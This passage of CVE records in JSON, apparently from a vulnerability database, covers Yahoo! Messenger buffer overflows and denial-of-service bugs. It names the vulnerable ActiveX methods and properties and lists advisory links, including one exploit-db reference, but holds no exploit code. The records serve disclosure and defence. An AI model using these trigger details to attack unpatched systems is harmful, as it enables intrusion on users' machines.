"third-party-advisory",
"x_refsource_CERT"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "20020221 Remote crashes in Yahoo messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"name": "VU#419419",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/419419"
},
{
"name": "yahoo-messenger-imvironment-bo(8265)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "http://www.iss.net/security_center/static/8265.php"
},
{
"name": "yahoo-messenger-message-bo(8264)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "http://www.iss.net/security_center/static/8264.php"
},
{
"name": "4163",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/4163"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-0320",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in Yahoo! Messenger 5.0 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long (1) message or (2) IMvironment field."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "4162",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/4162"
},
{
"name": "VU#887319",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/887319"
},
{
"name": "CA-2002-16",
"refsource": "CERT",
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "20020221 Remote crashes in Yahoo messenger",
"refsource": "BUGTRAQ",
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"name": "VU#419419",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/419419"
},
{
"name": "yahoo-messenger-imvironment-bo(8265)",
"refsource": "XF",
"url": "http://www.iss.net/security_center/static/8265.php"
},
{
"name": "yahoo-messenger-message-bo(8264)",
"refsource": "XF",
"url": "http://www.iss.net/security_center/static/8264.php"
},
{
"name": "4163",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/4163"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-0320",
"datePublished": "2002-05-03T04:00:00",
"dateReserved": "2002-05-01T00:00:00",
"dateUpdated": "2024-08-08T02:42:29.167Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-1680 (GCVE-0-2007-1680)
Vulnerability from cvelistv5
Published
2007-04-06 01:00
Modified
2024-08-07 13:06
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Stack-based buffer overflow in the createAndJoinConference function in the AudioConf ActiveX control (yacscom.dll) in Yahoo! Messenger before 20070313 allows remote attackers to execute arbitrary code via long (1) socksHostname and (2) hostname properties.
References
| ▼ | URL | Tags |
|---|---|---|
| https://exchange.xforce.ibmcloud.com/vulnerabilities/33408 | vdb-entry, x_refsource_XF | |
| http://www.securityfocus.com/bid/23291 | vdb-entry, x_refsource_BID | |
| http://secunia.com/advisories/24742 | third-party-advisory, x_refsource_SECUNIA | |
| http://www.kb.cert.org/vuls/id/388377 | third-party-advisory, x_refsource_CERT-VN | |
| http://www.zerodayinitiative.com/advisories/ZDI-07-012.html | x_refsource_MISC | |
| http://securityreason.com/securityalert/2523 | third-party-advisory, x_refsource_SREASON | |
| http://www.vupen.com/english/advisories/2007/1219 | vdb-entry, x_refsource_VUPEN | |
| http://osvdb.org/34319 | vdb-entry, x_refsource_OSVDB | |
| http://www.securitytracker.com/id?1017867 | vdb-entry, x_refsource_SECTRACK | |
| http://messenger.yahoo.com/security_update.php?id=031207 | x_refsource_CONFIRM | |
| http://www.securityfocus.com/archive/1/464607/100/0/threaded | mailing-list, x_refsource_BUGTRAQ |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T13:06:26.204Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "yahoo-yahooaudioconf-activex-bo(33408)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/33408"
},
{
"name": "23291",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/23291"
},
{
"name": "24742",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/24742"
},
{
"name": "VU#388377",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/388377"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html"
},
{
"name": "2523",
"tags": [
"third-party-advisory",
"x_refsource_SREASON",
"x_transferred"
],
"url": "http://securityreason.com/securityalert/2523"
},
{
"name": "ADV-2007-1219",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/1219"
},
{
"name": "34319",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/34319"
},
{
"name": "1017867",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1017867"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://messenger.yahoo.com/security_update.php?id=031207"
},
{
"name": "20070403 ZDI-07-012: Yahoo! Messenger AudioConf ActiveX Control Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/464607/100/0/threaded"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-04-02T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in the createAndJoinConference function in the AudioConf ActiveX control (yacscom.dll) in Yahoo! Messenger before 20070313 allows remote attackers to execute arbitrary code via long (1) socksHostname and (2) hostname properties."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "yahoo-yahooaudioconf-activex-bo(33408)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/33408"
},
{
"name": "23291",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/23291"
},
{
"name": "24742",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/24742"
},
{
"name": "VU#388377",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/388377"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html"
},
{
"name": "2523",
"tags": [
"third-party-advisory",
"x_refsource_SREASON"
],
"url": "http://securityreason.com/securityalert/2523"
},
{
"name": "ADV-2007-1219",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/1219"
},
{
"name": "34319",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/34319"
},
{
"name": "1017867",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1017867"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://messenger.yahoo.com/security_update.php?id=031207"
},
{
"name": "20070403 ZDI-07-012: Yahoo! Messenger AudioConf ActiveX Control Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/464607/100/0/threaded"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-1680",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Stack-based buffer overflow in the createAndJoinConference function in the AudioConf ActiveX control (yacscom.dll) in Yahoo! Messenger before 20070313 allows remote attackers to execute arbitrary code via long (1) socksHostname and (2) hostname properties."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "yahoo-yahooaudioconf-activex-bo(33408)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/33408"
},
{
"name": "23291",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/23291"
},
{
"name": "24742",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/24742"
},
{
"name": "VU#388377",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/388377"
},
{
"name": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html",
"refsource": "MISC",
"url": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html"
},
{
"name": "2523",
"refsource": "SREASON",
"url": "http://securityreason.com/securityalert/2523"
},
{
"name": "ADV-2007-1219",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/1219"
},
{
"name": "34319",
"refsource": "OSVDB",
"url": "http://osvdb.org/34319"
},
{
"name": "1017867",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1017867"
},
{
"name": "http://messenger.yahoo.com/security_update.php?id=031207",
"refsource": "CONFIRM",
"url": "http://messenger.yahoo.com/security_update.php?id=031207"
},
{
"name": "20070403 ZDI-07-012: Yahoo! Messenger AudioConf ActiveX Control Buffer Overflow",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/464607/100/0/threaded"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-1680",
"datePublished": "2007-04-06T01:00:00",
"dateReserved": "2007-03-26T00:00:00",
"dateUpdated": "2024-08-07T13:06:26.204Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2009-4171 (GCVE-0-2009-4171)
Vulnerability from cvelistv5
Published
2009-12-02 19:00
Modified
2024-08-07 06:54
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
An ActiveX control in YahooBridgeLib.dll for Yahoo! Messenger 9.0.0.2162, and possibly other 9.0 versions, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by calling the RegisterMe method with a long argument.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/archive/1/507818/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/54263 | vdb-entry, x_refsource_XF | |
| http://www.securityfocus.com/bid/37007 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T06:54:09.794Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20091112 Yahoo Messenger 9 ActiveX DoS (Null Pointer) Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/507818/100/0/threaded"
},
{
"name": "yahoo-messenger-activex-dos(54263)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54263"
},
{
"name": "37007",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/37007"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2009-11-12T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "An ActiveX control in YahooBridgeLib.dll for Yahoo! Messenger 9.0.0.2162, and possibly other 9.0 versions, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by calling the RegisterMe method with a long argument."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-10T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20091112 Yahoo Messenger 9 ActiveX DoS (Null Pointer) Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/507818/100/0/threaded"
},
{
"name": "yahoo-messenger-activex-dos(54263)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54263"
},
{
"name": "37007",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/37007"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2009-4171",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An ActiveX control in YahooBridgeLib.dll for Yahoo! Messenger 9.0.0.2162, and possibly other 9.0 versions, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by calling the RegisterMe method with a long argument."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20091112 Yahoo Messenger 9 ActiveX DoS (Null Pointer) Vulnerability",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/507818/100/0/threaded"
},
{
"name": "yahoo-messenger-activex-dos(54263)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54263"
},
{
"name": "37007",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/37007"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2009-4171",
"datePublished": "2009-12-02T19:00:00",
"dateReserved": "2009-12-02T00:00:00",
"dateUpdated": "2024-08-07T06:54:09.794Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-4635 (GCVE-0-2007-4635)
Vulnerability from cvelistv5
Published
2007-08-31 23:00
Modified
2024-09-16 16:32
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Yahoo! Messenger 8.1.0.209 and 8.1.0.402 allows remote attackers to cause a denial of service (application crash) via certain file-transfer packets, possibly involving a buffer overflow, as demonstrated by ym8bug.exe. NOTE: this might be related to CVE-2007-4515. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/25484 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T15:01:10.131Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "25484",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/25484"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger 8.1.0.209 and 8.1.0.402 allows remote attackers to cause a denial of service (application crash) via certain file-transfer packets, possibly involving a buffer overflow, as demonstrated by ym8bug.exe. NOTE: this might be related to CVE-2007-4515. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2007-08-31T23:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "25484",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/25484"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-4635",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Yahoo! Messenger 8.1.0.209 and 8.1.0.402 allows remote attackers to cause a denial of service (application crash) via certain file-transfer packets, possibly involving a buffer overflow, as demonstrated by ym8bug.exe. NOTE: this might be related to CVE-2007-4515. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "25484",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/25484"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-4635",
"datePublished": "2007-08-31T23:00:00Z",
"dateReserved": "2007-08-31T00:00:00Z",
"dateUpdated": "2024-09-16T16:32:44.068Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3147 (GCVE-0-2007-3147)
Vulnerability from cvelistv5
Published
2007-06-11 18:00
Modified
2024-08-07 14:05
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:05:28.302Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20070606 Yahoo 0day ActiveX Webcam Exploit",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html"
},
{
"name": "4042",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/4042"
},
{
"name": "24354",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24354"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "VU#949817",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/949817"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "yahoo-webcam-upload-bo(34758)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34758"
},
{
"name": "24341",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018203"
},
{
"name": "2809",
"tags": [
"third-party-advisory",
"x_refsource_SREASON",
"x_transferred"
],
"url": "http://securityreason.com/securityalert/2809"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-06-06T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20070606 Yahoo 0day ActiveX Webcam Exploit",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html"
},
{
"name": "4042",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/4042"
},
{
"name": "24354",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24354"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "VU#949817",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/949817"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "yahoo-webcam-upload-bo(34758)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34758"
},
{
"name": "24341",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018203"
},
{
"name": "2809",
"tags": [
"third-party-advisory",
"x_refsource_SREASON"
],
"url": "http://securityreason.com/securityalert/2809"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3147",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20070606 Yahoo 0day ActiveX Webcam Exploit",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html"
},
{
"name": "4042",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/4042"
},
{
"name": "24354",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24354"
},
{
"name": "http://research.eeye.com/html/advisories/upcoming/20070605.html",
"refsource": "MISC",
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "VU#949817",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/949817"
},
{
"name": "http://messenger.yahoo.com/security_update.php?id=060707",
"refsource": "CONFIRM",
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "yahoo-webcam-upload-bo(34758)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34758"
},
{
"name": "24341",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1018203"
},
{
"name": "2809",
"refsource": "SREASON",
"url": "http://securityreason.com/securityalert/2809"
},
{
"name": "http://research.eeye.com/html/advisories/published/AD20070608.html",
"refsource": "MISC",
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3147",
"datePublished": "2007-06-11T18:00:00",
"dateReserved": "2007-06-11T00:00:00",
"dateUpdated": "2024-08-07T14:05:28.302Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2005-0737 (GCVE-0-2005-0737)
Vulnerability from cvelistv5
Published
2005-03-13 05:00
Modified
2024-09-17 02:01
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Buffer overflow in Yahoo! Messenger allows remote attackers to execute arbitrary code via the offline mode.
References
| ▼ | URL | Tags |
|---|---|---|
| http://seclists.org/lists/fulldisclosure/2005/Mar/0284.html | mailing-list, x_refsource_FULLDISC | |
| http://www.securityfocus.com/bid/12750 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T21:21:06.520Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20050308 Yahoo! Messenger Offline Mode Status Remote Buffer Overflow Vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/lists/fulldisclosure/2005/Mar/0284.html"
},
{
"name": "12750",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/12750"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in Yahoo! Messenger allows remote attackers to execute arbitrary code via the offline mode."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2005-03-13T05:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
